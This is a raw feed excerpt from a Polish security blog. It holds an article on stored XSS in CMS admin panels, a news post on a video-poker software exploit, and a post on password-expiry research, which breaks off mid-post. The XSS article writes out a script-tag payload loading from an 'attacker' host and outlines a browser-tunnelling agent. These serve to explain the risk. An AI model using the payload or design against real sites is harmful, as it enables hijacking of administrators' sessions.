&lt;div style=&quot;text-align: justify;&quot;&gt;
Co myślicie o tym &lt;i&gt;sposobie na bankomat&lt;/i&gt;? Może i nie jest najbardziej skuteczny, za to z pewnością temu przestępcy należą się słowa uznania za wierność rozbójniczej tradycji oraz nieuleganie gadżeciarstwu. Wszakże złodzieje korzystający ze skimmerów i innych elektronicznych gotowców, to przy nim jedynie marni script kiddies!&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/2162791246072706166/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/po-co-komu-skimmery-gdy-mamy-pod-reka.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/2162791246072706166'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/2162791246072706166'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/po-co-komu-skimmery-gdy-mamy-pod-reka.html' title='Po co komu skimmery, gdy mamy pod ręką siekierę?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_u3ZzslP1iEznR9Ma1xbK9FXpXCJSkAT0T7zoKkr7b_UBg0SwjgY2O0rnLGUc52ncEsg6cmhepF4rXSiOowF_JxTelvagwNGVCjrdBiyCHPncKOprsisTbwN5c5b5u_spyavfq_O5F2A/s72-c/atm.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-6706696988008142585</id><published>2011-01-08T19:45:00.003+01:00</published><updated>2011-01-08T21:31:36.837+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo aplikacji"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><title type='text'>E.T. dzwoni do domu, czyli XSS w adminie</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/et-dzwoni-do-domu-czyli-xss-w-adminie.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjXG4RpxP5vD7P5gRiZaAv0A_g4csDP30tZRGxSCwgH1WXh4dR7JJzuPg1LeEHMXeqnIwilwLzZgNizHED8MfOUZmhsCWOUhgkTZNtkCiv1sRoX6S0ufanYu9pzZrp8Aqf67E552gcv1s/s1600/ET.png&quot; /&gt;&lt;/a&gt;&lt;b&gt;Autorem poniższego opracowania jest Dariusz Tytko (użytkownik Gmaila: tyter9)&lt;/b&gt;. Przy okazji przypomnę tylko, że praktycznie &lt;a href=&quot;http://www.hcsl.pl/2010/02/nie-pytaj-co-hcsl-moze-zrobic-dla.html&quot;&gt;każdy może&lt;/a&gt; zostać autorem, a nawet redaktorem HARD CORE SECURITY LAB! Zachęcam również do zapoznania się z &lt;a href=&quot;http://www.hcsl.pl/2010/07/vbulletin-interesujaca-podatnosc-typu.html&quot;&gt;poprzednim artykułem&lt;/a&gt; Darka.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Typowa aplikacja webowa składa się z dwóch komponentów, portalu udostępniającego pewną funkcjonalność klientom oraz części umożliwiającej zarządzenie, czyli tytułowego &quot;admina&quot; (CMS). Kod portalu coraz częściej powstaje z uwzględnieniem zasad bezpiecznego programowania, niestety nie zawsze to samo można powiedzieć o drugim z wymienionych komponentów...&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Taki stan rzeczy często tłumaczony jest na jeden z następujących sposobów: &quot;tylko garstka zaufanych użytkowników korzysta z aplikacji&quot;, &quot;to nasze autorskie rozwiązanie, nikt nie wie jak działa, tym bardziej nie będzie w stanie znaleźć błędu&quot;, &quot;aplikacja dostępna jest tylko w sieci wewnętrznej&quot; itp. W artykule postaram się wykazać, że taka polityka prowadzenia projektu, w niesprzyjających warunkach może doprowadzić do poważnych w skutkach konsekwencji.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Na potrzeby artykułu zaatakujemy prostą aplikację testową, która umożliwia użytkownikom wyrażanie swoich opinie w postaci komentarzy. Załóżmy, że w części portalowej nie udało nam się znaleźć żadnej z typowych podatności. Sytuacja wydaje się beznadziejna. Jedyna szansa dla potencjalnego intruza jest więc taka, że CMS zawiera jakieś błędy.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Pytanie jednak, jak zaatakować aplikację, której istnienia jedynie się domyślamy? Z dużym prawdopodobieństwem CMS tego typu aplikacji umożliwia moderację umieszczonych treści, co wiąże się z koniecznością ich wyświetlenia. Jeżeli nie zastosowano odpowiedniej walidacji, będziemy w stanie przeprowadzić atak typu XSS np. poprzez umieszczenie komentarza o następującej treści &lt;code&gt;&amp;lt;script src=&quot;http://attacker/payload.js&quot;&amp;gt;&amp;lt;/script&amp;gt;&lt;/code&gt;. Teraz pozostaje już tylko czekać, aż moderator wyświetli komentarz, a tym samym uruchomi nasz kod.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Kolejne pytanie brzmi, jak skonstruować użyteczny payload, bez jakiejkolwiek wiedzy na temat szczegółów działania aplikacji? Rozwiązaniem może być kod, który realizuje poniższy scenariusz:&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;Przeglądarka moderatora uruchamia nasz kod (agent).&lt;/li&gt;
&lt;li&gt;Agent nawiązuje połączenie z aplikacją uruchomioną na naszym serwerze (kontroler).&lt;/li&gt;
&lt;li&gt;Kontroler uruchamia serwer proxy.&lt;/li&gt;
&lt;li&gt;Kontroler powiadamia nas o utworzeniu nowego tunelu (serwer proxy skojarzony z agentem uruchomionym w przeglądarce moderatora).&lt;/li&gt;
&lt;li&gt;Wysyłamy zapytanie do serwera proxy.&lt;/li&gt;
&lt;li&gt;Proxy wysyła zapytanie do kontrolera.&lt;/li&gt;
&lt;li&gt;Agent pobiera treść zapytania od kontrolera.&lt;/li&gt;
&lt;li&gt;Agent wykonuje zapytanie w przeglądarce moderatora (ajax).&lt;/li&gt;
&lt;li&gt;Agent wysyła odpowiedź do kontrolera.&lt;/li&gt;
&lt;li&gt;Kontroler przekazuje odpowiedź do serwera proxy.&lt;/li&gt;
&lt;li&gt;Serwer proxy przekazuje odpowiedź do naszej przeglądarki.&lt;/li&gt;
&lt;li&gt;(Idź do kroku 5).&lt;/li&gt;
&lt;/ol&gt;
&lt;div&gt;
Na potrzeby artykułu powstała aplikacja implementująca powyższy algorytm (&lt;i&gt;etproxy&lt;/i&gt;). Dwa główne problemy, z którymi należało się zmierzyć to:&lt;/div&gt;
&lt;div&gt;
&lt;ol&gt;
&lt;li&gt;Implementacja kanału komunikacyjnego pomiędzy agentem a kontrolerem.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Czas życia agenta ograniczony do czasu wizyty moderatora na stronie uruchamiającej payload.&amp;nbsp;&lt;/li&gt;
&lt;/ol&gt;
&lt;div&gt;
Do rozwiązania pierwszego problemu, użyty został mechanizm &lt;a href=&quot;http://www.w3.org/TR/access-control/&quot;&gt;Cross-Origin Resource Sharing&lt;/a&gt;. W dużym skrócie: możliwe jest wykonywanie zapytań ajax&#39;owych (i odczytywanie odpowiedzi) do dowolnej domeny, o ile strona wywoływana na to pozwoli (poprzez ustawienie odpowiednich nagłówków w odpowiedzi). Niestety rozwiązanie nie jest obsługiwane przez wszystkie przeglądarki, zwłaszcza te starsze.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Rozwiązanie drugiego problemu sprowadza się do pewnej sztuczki. W chwili uruchomienia agenta, do wszystkich linków na stronie podpięte zostaje zdarzenie (&lt;i&gt;onclick&lt;/i&gt;), które blokuje możliwość opuszczenia strony. Zamiast tego, w chwili kliknięcia w link do struktury DOM dokumentu dodawany jest znacznik &lt;i&gt;iframe&lt;/i&gt;, ze źródłem (&lt;i&gt;src&lt;/i&gt;), na które wskazywał dany link (&lt;i&gt;href&lt;/i&gt;). Dodatkowo &lt;i&gt;iframe&lt;/i&gt; jest rozszerzany do 100% szerokości i wysokości okna, zakrywając w ten sposób bieżącą zawartość. W ten sposób użytkownikowi serwowana jest spodziewana zawartość, bez potrzeby przechodzenia na inną stronę. Rozwiązanie nie jest jednak pozbawione wad:&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;Użytkownik nawiguje w obrębie &lt;i&gt;iframe&lt;/i&gt;&#39;a, co wiąże się z konsekwencjami w postaci niezmieniającego się adresu strony (w pasku adresu).&lt;/li&gt;
&lt;li&gt;Docelowa strona może zwierać mechanizmy, uniemożliwiające wyświetlenie jej zawartości w &lt;i&gt;iframe&lt;/i&gt;&#39;ie (patrz nagłówek X-Frame-Options itp.).&lt;/li&gt;
&lt;li&gt;W dobie aplikacji ajax&#39;owych, rolą niektórych linków może nie być przełączenie strony, a wykonanie bardziej złożonego zadania jak np. przeładowanie tylko jej części. Kliknięcie w zmodyfikowaną wersję takiego linku z dużym prawdopodobieństwem zakończy się załadowaniem pustego iframe&#39;a.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Oto wspomniana aplikacja w akcji:&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;object height=&quot;390&quot; width=&quot;640&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/A_UJA1dAUwQ&amp;amp;hl=pl_PL&amp;amp;feature=player_embedded&amp;amp;version=3&quot;&gt;










&lt;/param&gt;
&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;










&lt;/param&gt;
&lt;param name=&quot;allowScriptAccess&quot; value=&quot;always&quot;&gt;










&lt;/param&gt;
&lt;embed src=&quot;http://www.youtube.com/v/A_UJA1dAUwQ&amp;amp;hl=pl_PL&amp;amp;feature=player_embedded&amp;amp;version=3&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot; allowScriptAccess=&quot;always&quot; width=&quot;640&quot; height=&quot;390&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Przyznaję, że przeprowadzenie przedstawionego ataku, w warunkach rzeczywistych nie należy do rzeczy łatwych. Kluczowe znaczenie ma czas pracy użytkownika CMS&#39;a. Nie mniej nie da się zaprzeczyć, że realne ryzyko istnieje. Decyzję, czy należy je uwzględnić w praktyce, pozostawiam czytelnikom.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/6706696988008142585/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/et-dzwoni-do-domu-czyli-xss-w-adminie.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/6706696988008142585'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/6706696988008142585'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/et-dzwoni-do-domu-czyli-xss-w-adminie.html' title='E.T. dzwoni do domu, czyli XSS w adminie'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjXG4RpxP5vD7P5gRiZaAv0A_g4csDP30tZRGxSCwgH1WXh4dR7JJzuPg1LeEHMXeqnIwilwLzZgNizHED8MfOUZmhsCWOUhgkTZNtkCiv1sRoX6S0ufanYu9pzZrp8Aqf67E552gcv1s/s72-c/ET.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-6596885286555062316</id><published>2011-01-08T04:19:00.004+01:00</published><updated>2011-01-08T09:17:31.817+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><category scheme="http://www.blogger.com/atom/ns#" term="Newsy"/><title type='text'>HackJackpot, czyli jak okraść jednorękiego bandytę?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/hackjackpot-czyli-jak-okrasc.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD6nxezRJqzAaOWzds5oPrCeLu2zVweGW9vbEmecmvjF6pYU_XwLmy99YtSJOyBIO3-xw49ZqzvOCwtfsWnVxbGmrCf1XDtn6cIzvPN3WNEXgHAXIr2UK62WRM6C8J6ebGGAW3BCksVPM/s1600/HackJackpot.png&quot; /&gt;&lt;/a&gt;W kasynie gier hazardowych zarabia wyłącznie właściciel oraz nieliczni gracze. Gracze odnoszący sukces dzielą się na tych którzy mają niezwykłe szczęście i tych którzy... oszukują. Historia oszustw związanych z grami hazardowymi jest tak stara, jak sam hazard, a pomysłowość oszustów zdaje się nie mieć żadnych granic. Całkiem niedawno &lt;a href=&quot;http://www.hcsl.pl/2010/06/kiedy-komputerowi-przestepcy.html&quot;&gt;zastanawiałem się&lt;/a&gt;&amp;nbsp;nad tym, czy już w najbliższej przyszłości nieuczciwi hazardziści skupią się na lukach w oprogramowaniu wykorzystywanym przez kasyna oraz same nowoczesne automaty do gier hazardowych i wygląda na to, że właśnie jesteśmy świadkami zdemaskowania jednego z pierwszych tego typu przestępstw na masową skalę.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Nowoczesne kasyna gier hazardowych już od dawna &lt;a href=&quot;http://www.hcsl.pl/2010/06/kiedy-komputerowi-przestepcy.html&quot;&gt;masowo wykorzystują nowoczesne technologie informatyczne&lt;/a&gt; oraz automaty będące tak naprawdę komputerami pracującymi pod kontrolą wyspecjalizowanego oprogramowania. Nic więc dziwnego, że do skutecznego oszukania tego typu urządzeń wystarczy odkrycie jakiejś luki obecnej w ich oprogramowaniu.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Dwaj Amerykanie (John Kane oraz Andre Nestor) odkryli bardzo interesującą lukę w oprogramowaniu automatów do gry w pokera produkowanych przez firmę &lt;a href=&quot;http://www.igt.com/&quot;&gt;International Game Technology&lt;/a&gt;. Otóż jak się okazuje, wystarczyło tylko grać małymi stawkami do czasu uzyskania wygranej, a następnie za pomocą specjalnej sekwencji przycisków możliwe było znaczne podbicie stawki i ponowienie wygranej. Co ciekawe, taka wygrana nie była przez urządzenie logowana. W taki oto sposób dwaj mężczyźni nielegalnie zarobili co najmniej kilkaset tysięcy USD.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Warto również nadmienić, że przeprowadzenie skutecznego ataku zazwyczaj wymagało również od nieuczciwych hazardzistów wykonania małego ataku socjotechnicznego. Otóż magiczna sekwencja przycisków działała wyłącznie wtedy, gdy na urządzeniu uprzednio aktywowana została mało popularna funkcja &lt;i&gt;double-up&lt;/i&gt; (zwiększająca wygrane, ale i również ryzyko gracza). Zazwyczaj jednak mężczyznom udawało się przekonać obsługę kasyna do zmiany ustawień poszczególnych automatów.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Gdy już chciwość zawładnęła umysłami mężczyzn i ich masowe wygrane zaczęły przyciągać uwagę, rozpoczęło się federalne śledztwo. W jego wyniku w niedługim czasie mężczyźni zostali aresztowani przez FBI pod odpowiednimi &lt;a href=&quot;http://www.wired.com/images_blogs/threatlevel/2011/01/vegas-exploit.pdf&quot;&gt;zarzutami federalnymi&lt;/a&gt;. Andre Nestor wydaje się jednak być takimi zarzutami zdziwiony, gdyż jego zdaniem cała działalność nie była nielegalna:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;blockquote&gt;
Przecież tylko naciskałem przyciski na automatach! Czy teraz wygrywanie pieniędzy w kasynie jest już nielegalne? (...) To nie moja wina, że oprogramowanie pozwalało graczowi na swobodne wygrywanie!&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.blogger.com/video.g?token=AD6v5dzjBpW-TjGBio6JdYuXAjSAEpWwTPnDSYwxo7fGPTvbagIP3KVkig6ESd3Zin1uMe5muiX4zkFI_qdGvNF-&#39; class=&#39;b-hbp-video b-uploaded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;
Moim zdaniem w całej sprawie najbardziej interesująca jest jednak sama luka obecna w oprogramowaniu automatów. Czy sekwencja przycisków pozwalająca na swobodne wygrywanie (z pominięciem logowania takiego zdarzenia!) to rzeczywiście luka, czy może jednak funkcja celowo zaimplementowana przez producenta? Być może jest to po prostu furtka celowo pozostawiony przez samego programistę tworzącego oprogramowanie urządzenia? Ile tego typu ukrytych funkcji jest obecnych w popularnych automatach do gier hazardowych i ile osób wie o ich istnieniu?&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
[&lt;a href=&quot;http://www.lvrj.com/news/two-indicted-in-video-poker-scam-112980314.html&quot;&gt;źródło&lt;/a&gt;]&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/6596885286555062316/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/hackjackpot-czyli-jak-okrasc.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/6596885286555062316'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/6596885286555062316'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/hackjackpot-czyli-jak-okrasc.html' title='HackJackpot, czyli jak okraść jednorękiego bandytę?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD6nxezRJqzAaOWzds5oPrCeLu2zVweGW9vbEmecmvjF6pYU_XwLmy99YtSJOyBIO3-xw49ZqzvOCwtfsWnVxbGmrCf1XDtn6cIzvPN3WNEXgHAXIr2UK62WRM6C8J6ebGGAW3BCksVPM/s72-c/HackJackpot.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-4160223969945714191</id><published>2011-01-06T17:13:00.003+01:00</published><updated>2011-01-06T17:17:13.540+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo aplikacji"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo danych"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo systemów operacyjnych"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><title type='text'>Czy okresowe wymuszanie zmiany haseł ma jakikolwiek sens?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/czy-okresowe-wymuszanie-zmiany-hase-ma.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkJulmeR0YD3qItA7cQVZ0ZRmvXVzjvk4r2jxogwmO2YVPNFuaDYGxgCo1IrFLyyHDkALkXlkYnTNIzdxBmxqjnPnmIfvx94ELZwPk-DO54rHhM7rVKaHIq2nlaCgalc6-Giqp6CpuMXn5/s320/password.png&quot; /&gt;&lt;/a&gt;Uwierzytelnianie, czyli weryfikowanie zadeklarowanej tożsamości użytkowników rozmaitych usług oraz systemów informatycznych, od zarania cyfrowych dziejów odbywa się z wykorzystaniem nieśmiertelnych haseł dostępowych. Od wielu lat rozmaite polityki bezpieczeństwa informatycznego niezmiennie wymagają zaś wdrożenia mechanizmów wymuszających okresowe (np. comiesięczne) zmiany wszystkich haseł dostępowych. Słuszność takiego podejścia od dawna budzi spore wątpliwości, brakowało jednak solidnych dowodów na całkowite podważenie sensu częstego wymuszania zmiany poświadczeń.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Oczywiście użytkownicy systemów informatycznych wymuszających częste zmiany haseł już od dawna mają w tej sprawie wyrobione własne zdanie. Ich zdaniem tego typu mechanizmy są pozbawione jakiegokolwiek sensu i tylko utrudniają pracę. Z pewnością hasło, które wyekspirowało w momencie, w którym dany system był najbardziej potrzebny, może doprowadzić użytkownika do szewskiej pasji. Nie jest również tajemnicą, że sami administratorzy systemów informatycznych czasem również wątpią w sens częstego wymuszania zmiany haseł.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1WytyxDt9MzCw52fDNxJSbqt2RkYikaQ6j6OFRoUpuWX-JwqTkS2UpWVIaZx7iXBkVZNhwl7x-jsPMchxLcOuht4BRaxhskOfhbL9oGS0XvPqushuYmDzipwIy0IKE00rpugHwhrX5jI/s1600/PassExp01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1WytyxDt9MzCw52fDNxJSbqt2RkYikaQ6j6OFRoUpuWX-JwqTkS2UpWVIaZx7iXBkVZNhwl7x-jsPMchxLcOuht4BRaxhskOfhbL9oGS0XvPqushuYmDzipwIy0IKE00rpugHwhrX5jI/s1600/PassExp01.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Hasło znów wygasło w najmniej odpowiednim momencie?&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Wymuszanie częstej zmiany haseł na pewno może w jakimś stopniu zmniejszyć produktywność pracowników. Ile czasu miesięcznie zajmuje przeciętnemu użytkownikowi skuteczna zmiana 5 haseł broniących dostępu do 5 różnych wykorzystywanych przez niego na co dzień systemów i programów? Z moich obserwacji wynika, że wdrożenie systemu zarządzania tożsamością (w skrócie pozwalającego na zalogowanie się do każdego systemu za pomocą tych samych poświadczeń) nie zawsze w pełni rozwiązuje ten problem, gdyż często po zmianie hasła występuje efekt oczekiwania na skuteczne rozpropagowanie się nowych poświadczeń pośród wszystkich systemów IT. Ile czasu taki użytkownik poświęca również na kontakty z działem wsparcia informatycznego, niezbędne w przypadkach zapominania niedawno zmienionych haseł? Do tej pory brakowało jednak wyraźnych dowodów na to, że częste wymuszanie zmiany haseł poza powyższymi przypadłościami, nie wpływa również wcale pozytywnie na bezpieczeństwo.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Trzej badacze, a mianowicie Yinqian Zhang, Fabian Monrose oraz Michael K. Reiter, przeprowadzili jednak pierwsze zakrojone na dużą skalę badania nad bezpieczeństwem współczesnych mechanizmów wymuszania zmiany haseł i trzeba przyznać, że &lt;a href=&quot;http://www.cs.unc.edu/~yinqian/papers/PasswordExpire.pdf&quot;&gt;opublikowane wyniki&lt;/a&gt; są bardzo interesujące i niepokojące zarazem. Okazało się przykładowo, że stosunkowo prosty algorytm pozwala na odgadnięcie bieżących haseł typowego użytkownika na podstawie znajomości jego poprzednich haseł nawet w 90% przypadków! 41% haseł udawało się w taki sposób złamać w czasie krótszym niż 3 sekundy...&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Cóż się więc okazuje? Otóż mechanizm czasowej ważności haseł zazwyczaj w ogóle nie spełnia swego zadania (nie powstrzyma intruza od dalszego uzyskiwania dostępu do danego konta po kolejnej zmianie hasła), gdyż użytkownicy zmieniając hasła na kolejne, stosują zazwyczaj frazy niewiele różniące się od poprzednich (np. zmiana hasła &lt;i&gt;jan.kowalski01&lt;/i&gt; na &lt;i&gt;jan.kowalski02&lt;/i&gt;. &lt;b&gt;Zagadka&lt;/b&gt;: jakiego hasła Jan Kowalski używa w czerwcu?) i przez to bardzo proste do ponownego odgadnięcia.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI0CaLAKUlnwjfsc08o634BbUgFjpzLTLrn2cy1y4AnvEhfc0RTBTrRp73hibX68FPIULjbHtuPnKuCvXitX8uiwULGCuNb66R2v32Z6t4j_ZT5w0TU9j18hnpQ1JB5tzLOD7WPqIvXAw/s1600/PassExp02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI0CaLAKUlnwjfsc08o634BbUgFjpzLTLrn2cy1y4AnvEhfc0RTBTrRp73hibX68FPIULjbHtuPnKuCvXitX8uiwULGCuNb66R2v32Z6t4j_ZT5w0TU9j18hnpQ1JB5tzLOD7WPqIvXAw/s1600/PassExp02.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
